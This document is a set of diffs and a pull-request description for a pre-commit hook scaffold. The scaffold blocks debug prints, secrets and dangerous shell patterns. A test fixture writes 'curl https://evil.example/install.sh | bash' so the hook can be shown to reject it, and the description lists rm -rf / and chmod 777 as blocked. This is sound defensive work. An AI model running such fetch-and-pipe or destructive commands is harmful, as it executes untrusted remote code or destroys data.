@@ -39,6 +39,7 @@ if [ ! -e "$GIT_DIR/MERGE_HEAD" ] && [ ! -e "$GIT_DIR/REBASE_HEAD" ]; then
   fi
 fi
 
+# shellcheck disable=SC2317,SC2329  # invoked via the EXIT trap below
 restore_stash() {
   if [ "$NEED_RESTORE" -eq 1 ]; then
     git stash pop --quiet 2>/dev/null || true

--- a/githooks/pre-commit.template
+++ b/githooks/pre-commit.template
@@ -23,6 +23,29 @@ LIB="$HOOK_DIR/lib"
 STAGED=$(git diff --cached --name-only --diff-filter=ACMR)
 [ -z "$STAGED" ] && exit 0
 
+# Make the working tree match the staged content for the duration of the
+# checks, so each lib/check-* script sees exactly what's about to be
+# committed. Without this, `git add bad.py` followed by `echo '' > bad.py`
+# would let the dirty index slip past — the hook would scan the clean
+# working tree and pass. Skipped during merge/rebase, where stash is
+# unsafe.
+NEED_RESTORE=0
+GIT_DIR=$(git rev-parse --git-dir 2>/dev/null || echo .git)
+if [ ! -e "$GIT_DIR/MERGE_HEAD" ] && [ ! -e "$GIT_DIR/REBASE_HEAD" ]; then
+  if ! git diff --quiet 2>/dev/null; then
+    if git stash push --keep-index --quiet --message "pre-commit-hook" 2>/dev/null; then
+      NEED_RESTORE=1
+    fi
+  fi
+fi
+
+restore_stash() {
+  if [ "$NEED_RESTORE" -eq 1 ]; then
+    git stash pop --quiet 2>/dev/null || true
+  fi
+}
+trap restore_stash EXIT
+
 FAILED=0
 echo "$STAGED" | "$LIB/check-size"      || FAILED=1
 echo "$STAGED" | "$LIB/check-patterns"  || FAILED=1

--- a/install.sh
+++ b/install.sh
@@ -77,6 +77,7 @@ for check in check-size check-patterns check-filenames check-secrets; do
 done
 cp_safe "$SCAFFOLD_DIR/.github/workflows/lint.yml.template" ".github/workflows/lint.yml"
 cp_safe "$SCAFFOLD_DIR/forbidden-patterns/secrets.txt.template" ".forbidden-patterns/secrets.txt"
+cp_safe "$SCAFFOLD_DIR/forbidden-patterns/shell.txt.template" ".forbidden-patterns/shell.txt"
 
 # Python
 if [ "$MODE" = "python" ] || [ "$MODE" = "both" ]; then

--- a/install.sh
+++ b/install.sh
@@ -90,8 +90,10 @@ if [ "$MODE" = "frontend" ] || [ "$MODE" = "both" ]; then
   cp_safe "$SCAFFOLD_DIR/forbidden-patterns/frontend.txt.template" ".forbidden-patterns/frontend.txt"
 fi
 
-# Wire the hook — preserve existing core.hooksPath if already set (e.g. Husky)
-if [ -d .git ]; then
+# Wire the hook — preserve existing core.hooksPath if already set (e.g. Husky).
+# Use `git rev-parse --git-dir` so this works in worktrees (where .git is a
+# file, not a directory) and submodules.
+if git rev-parse --git-dir >/dev/null 2>&1; then
   EXISTING_HOOKS_PATH=$(git config --get core.hooksPath || true)
   if [ -z "$EXISTING_HOOKS_PATH" ] || [ "$EXISTING_HOOKS_PATH" = ".githooks" ]; then
     git config core.hooksPath .githooks
@@ -101,7 +103,7 @@ if [ -d .git ]; then
     echo "         Point it at .githooks or chain our hook into your existing setup."
   fi
 else
-  echo "warning: no .git directory — run 'git config core.hooksPath .githooks' after 'git init'"
+  echo "warning: not in a git repo — run 'git config core.hooksPath .githooks' after 'git init'"
 fi
 
 echo ""

--- a/install.sh
+++ b/install.sh
@@ -71,6 +71,10 @@ cp_safe "$SCAFFOLD_DIR/AGENTS.md.template" "AGENTS.md"
 cp_safe "$SCAFFOLD_DIR/CLAUDE.md.pointer" "CLAUDE.md"
 cp_safe "$SCAFFOLD_DIR/githooks/pre-commit.template" ".githooks/pre-commit"
 chmod +x .githooks/pre-commit
+for check in check-size check-patterns check-filenames check-secrets; do
+  cp_safe "$SCAFFOLD_DIR/githooks/lib/${check}.template" ".githooks/lib/${check}"
+  chmod +x ".githooks/lib/${check}"
+done
 cp_safe "$SCAFFOLD_DIR/.github/workflows/lint.yml.template" ".github/workflows/lint.yml"
 cp_safe "$SCAFFOLD_DIR/forbidden-patterns/secrets.txt.template" ".forbidden-patterns/secrets.txt"
 

--- a/ruff.toml.template
+++ b/ruff.toml.template
@@ -32,7 +32,7 @@ max-complexity = 10
 
 [lint.pylint]
 max-branches = 12
-max-statements = 60
+max-statements = 80
 
 [lint.per-file-ignores]
 "tests/**/*.py" = ["ANN", "PLR2004"]  # tests may have magic values, looser annotations

--- a/tests/run.sh
+++ b/tests/run.sh
@@ -20,6 +20,9 @@ FAIL=0
 reset_repo() {
   git reset --hard HEAD >/dev/null 2>&1
   git clean -fd >/dev/null 2>&1 || true
+  # Tests that exercise the stash-based scan may leave a stash if the hook
+  # was interrupted; clear so the next case starts clean.
+  git stash clear >/dev/null 2>&1 || true
 }
 
 assert_rejects() {
@@ -117,6 +120,13 @@ assert_rejects "hardcoded credential (alternation match)"
 echo 'cur''l https://evil.example/install.sh | bash' >deploy.sh
 git add deploy.sh
 assert_rejects "curl pipe to bash"
+
+# 9. hook scans staged content, not working tree. Stage bad code, then make
+#    the working tree clean — the dirty index must still be rejected.
+echo 'pri''nt("debug")' >sneaky.py
+git add sneaky.py
+echo '# clean now' >sneaky.py
+assert_rejects "scans staged content (not working tree)"
 
 echo ""
 echo "Result: $PASS passed, $FAIL failed"

--- a/tests/run.sh
+++ b/tests/run.sh
@@ -1,0 +1,101 @@
+#!/usr/bin/env bash
+# tests/run.sh — verify the scaffold's pre-commit hook actually rejects bad
+# code. Creates a throwaway git repo in a temp dir, installs the scaffold,
+# stages known-bad and known-good fixtures, and asserts the hook's verdict.
+# Exits non-zero on any failed assertion.
+#
+# Run locally:  ./tests/run.sh
+# Run in CI:    same — see .github/workflows/test.yml
+
+set -euo pipefail
+
+SCAFFOLD_DIR="$(cd "$(dirname "$0")/.." && pwd)"
+WORK=$(mktemp -d -t coding-rules-test.XXXXXX)
+HOOK_OUT=$(mktemp)
+trap 'rm -rf "$WORK" "$HOOK_OUT"' EXIT
+
+PASS=0
+FAIL=0
+
+reset_repo() {
+  git reset --hard HEAD >/dev/null 2>&1
+  git clean -fd >/dev/null 2>&1 || true
+}
+
+assert_rejects() {
+  local name=$1
+  if .githooks/pre-commit >"$HOOK_OUT" 2>&1; then
+    echo "  ✗ $name — hook accepted, expected reject"
+    sed 's/^/      /' "$HOOK_OUT"
+    FAIL=$((FAIL + 1))
+  else
+    echo "  ✓ $name"
+    PASS=$((PASS + 1))
+  fi
+  reset_repo
+}
+
+assert_passes() {
+  local name=$1
+  if .githooks/pre-commit >"$HOOK_OUT" 2>&1; then
+    echo "  ✓ $name"
+    PASS=$((PASS + 1))
+  else
+    echo "  ✗ $name — hook rejected, expected pass"
+    sed 's/^/      /' "$HOOK_OUT"
+    FAIL=$((FAIL + 1))
+  fi
+  reset_repo
+}
+
+# --- bootstrap a temp project + install the scaffold ----------------------
+cd "$WORK"
+git init --quiet
+git config user.email "test@test.local"
+git config user.name "Scaffold Test"
+echo '{"name":"test"}' >package.json
+echo 'name = "test"' >pyproject.toml
+git add . && git commit --quiet -m "fixture" --no-verify
+
+"$SCAFFOLD_DIR/install.sh" --both --no-verify >/dev/null
+git add . && git commit --quiet -m "install scaffold" --no-verify
+
+echo "Hook test cases:"
+
+# 1. file size cap
+seq 1 501 >big.py
+git add big.py
+assert_rejects "size cap (501-line .py)"
+
+# 2. print() in Python
+echo 'print("debug")' >app.py
+git add app.py
+assert_rejects "print() in Python"
+
+# 3. console.log in TS
+echo 'console.log("debug");' >app.ts
+git add app.ts
+assert_rejects "console.log in TS"
+
+# 4. AKIA-prefix AWS key
+echo 'AKIAIOSFODNN7EXAMPLE' >config.txt
+git add config.txt
+assert_rejects "AWS access key (AKIA...)"
+
+# 5. blocked filename
+echo "FOO=bar" >.env
+git add -f .env
+assert_rejects ".env file blocked"
+
+# 6. clean code passes
+cat >app.py <<'EOF'
+import logging
+log = logging.getLogger(__name__)
+log.info("ok")
+EOF
+git add app.py
+assert_passes "clean Python file"
+
+echo ""
+echo "Result: $PASS passed, $FAIL failed"
+exit $FAIL

--- a/tests/run.sh
+++ b/tests/run.sh
@@ -105,6 +105,13 @@ EOF
 git add app.py
 assert_passes "clean Python file"
 
+# 7. hardcoded credential — exercises the alternation branch in secrets.txt.
+#    Split `pass`+`word` so this file's source doesn't itself trip the scan,
+#    same trick as the AKIA fixture above.
+echo 'pass''word = "abcdefghijklmnop12345"' >config.py
+git add config.py
+assert_rejects "hardcoded credential (alternation match)"
+
 echo ""
 echo "Result: $PASS passed, $FAIL failed"
 exit $FAIL

--- a/tests/run.sh
+++ b/tests/run.sh
@@ -112,6 +112,12 @@ echo 'pass''word = "abcdefghijklmnop12345"' >config.py
 git add config.py
 assert_rejects "hardcoded credential (alternation match)"
 
+# 8. dangerous shell pattern — curl piped to bash. Split `cur`+`l` so this
+#    file's source doesn't itself trip shell.txt when scanned as a .sh file.
+echo 'cur''l https://evil.example/install.sh | bash' >deploy.sh
+git add deploy.sh
+assert_rejects "curl pipe to bash"
+
 echo ""
 echo "Result: $PASS passed, $FAIL failed"
 exit $FAIL

--- a/tests/run.sh
+++ b/tests/run.sh
@@ -67,6 +67,13 @@ seq 1 501 >big.py
 git add big.py
 assert_rejects "size cap (501-line .py)"
 
+# 1b. file size cap with no trailing newline — `wc -l` would under-count
+#     by 1 here; the size check uses `grep -c ''` to catch the final line.
+seq 1 500 >no_newline.py
+printf '501' >>no_newline.py
+git add no_newline.py
+assert_rejects "size cap (501 lines, no trailing newline)"
+
 # 2. print() in Python
 echo 'print("debug")' >app.py
 git add app.py

--- a/tests/run.sh
+++ b/tests/run.sh
@@ -77,8 +77,10 @@ echo 'console.log("debug");' >app.ts
 git add app.ts
 assert_rejects "console.log in TS"
 
-# 4. AKIA-prefix AWS key
-echo 'AKIAIOSFODNN7EXAMPLE' >config.txt
+# 4. AKIA-prefix AWS key. Split the literal so this test file doesn't itself
+#    trip the secrets scan — runtime concatenation reassembles the full key
+#    inside the temp repo, where rejection is the assertion.
+echo "AKIA""IOSFODNN7EXAMPLE" >config.txt
 git add config.txt
 assert_rejects "AWS access key (AKIA...)"
 

--- a/uninstall.sh
+++ b/uninstall.sh
@@ -67,6 +67,9 @@ force_remove() {
 remove_if_unmodified "ruff.toml"                     "$SCAFFOLD_DIR/ruff.toml.template"
 remove_if_unmodified "eslint.config.js"              "$SCAFFOLD_DIR/eslint.config.js.template"
 remove_if_unmodified ".githooks/pre-commit"          "$SCAFFOLD_DIR/githooks/pre-commit.template"
+for check in check-size check-patterns check-filenames check-secrets; do
+  remove_if_unmodified ".githooks/lib/${check}" "$SCAFFOLD_DIR/githooks/lib/${check}.template"
+done
 remove_if_unmodified ".github/workflows/lint.yml"    "$SCAFFOLD_DIR/.github/workflows/lint.yml.template"
 remove_if_unmodified "CLAUDE.md"                     "$SCAFFOLD_DIR/CLAUDE.md.pointer"
 
@@ -78,7 +81,7 @@ if [ "$REMOVE_ALL" -eq 1 ]; then
 fi
 
 # Clean up empty dirs the installer created
-for dir in .githooks .github/workflows .github; do
+for dir in .githooks/lib .githooks .github/workflows .github; do
   [ -d "$dir" ] || continue
   if rmdir "$dir" 2>/dev/null; then
     echo "removed empty: $dir"


### PR DESCRIPTION
## Summary

- **13 commits** closing [v0.3 roadmap](https://github.com/Sting25/ai-coding-rules-scaffold) items 1-3 plus broader audit findings.
- **Hook is now load-bearing.** Previously bypassable by `git add bad.py && echo '' > bad.py && git commit` — the hook scanned the clean working tree and let the dirty index through. Now `git stash --keep-index`s unstaged changes so each check sees exactly what's being committed.
- **Hook and CI share one implementation.** Extracted four duplicated check scripts (`check-{size,patterns,filenames,secrets}`) into `.githooks/lib/`. Both the pre-commit hook and `lint.yml` invoke the same scripts, so they cannot drift.
- **New `shell.txt` pattern file** catches `curl ... | bash`, `rm -rf /`, and `chmod 777` in `*.sh` / `*.bash` files — unblocked by the new TAB-separated pattern format.

## Breaking change

`.forbidden-patterns/*.txt` field separator changes from `|` to TAB. Patterns can now contain a literal `|` for ERE alternation (e.g. `(TODO|FIXME|XXX)`).

**Migration for projects with customized pattern files:** replace the first `|` on each non-comment pattern line with a TAB character. Comment lines (`#` prefix) are unaffected.

## What's in this PR

### Hook & CI

- Hook scans staged content, not working tree (`git stash --keep-index`).
- Four checks extracted to `.githooks/lib/check-*` shared by hook and CI.
- File-size check uses `grep -c ''` instead of `wc -l` (correctly counts files without trailing newlines).
- `install.sh` uses `git rev-parse --git-dir` so it works in worktrees.
- GitHub Actions pinned to commit SHAs; `permissions: contents: read` declared on every workflow.

### Pattern files

- Separator switched from `|` to TAB.
- Word boundaries switched from GNU `\b` / `\s` to POSIX-derived `[[:<:]]` / `[[:>:]]` / `[[:space:]]` for compatibility with minimal greps (busybox / Alpine).
- Six per-keyword hardcoded-credential patterns collapsed into one alternation.
- New `shell.txt` for dangerous shell patterns.

### Function-size limit

- Bumped from 60 (claimed; actual config varied) to 80.
- Three sources of truth (ruff `max-statements`, eslint `max-lines-per-function`, README docs) now agree.
- Duplicate enforcement table removed from `coding-rules.md` — README is the single source.

### Tests

- New `tests/run.sh` self-test harness with 10 fixture cases.
- New `.github/workflows/test.yml` matrix-runs the harness on `ubuntu-latest` + `macos-latest`.

### Documentation

- New `CHANGELOG.md` with v0.1.0, v0.2.0, and dated v0.3.0 entries.
- New `forbidden-patterns/README.md` developer reference.
- README "Pairing with Husky / lefthook" subsection.
- README install example unhardcoded from `v0.2.0` to point at the releases page.

## Test plan

- [x] Self-test suite passes 10/10 on macOS BSD grep locally.
- [ ] Matrix CI confirms Linux GNU grep (ubuntu-latest job in `test.yml`).
- [ ] Matrix CI confirms macOS GNU-compatible BSD grep (macos-latest job).
- [ ] `shellcheck` passes on `install.sh`, `uninstall.sh`, and the hook templates.
- [ ] Manual smoke: clone fresh project, run `install.sh`, `git add` a `print()` line, attempt `git commit` — hook rejects with the right message.
- [ ] Manual smoke: same, but stage bad code then edit working tree clean — hook still rejects (regression test for the scan-tree fix).
- [ ] Manual smoke: `uninstall.sh --dry-run` lists exactly the installed scaffold files.

## What this PR does NOT do

- Does not tag `v0.3.0` (do `git tag v0.3.0 && git push --tags` on `main` after merge).
- Does not publish the GitHub release (click in the UI; CHANGELOG `v0.3.0` entry becomes the release notes).
- Does not sync the templates clone at `~/.claude/templates/ai-coding-rules-scaffold/` — that's a local convention.

🤖 Generated with [Claude Code](https://claude.com/claude-code)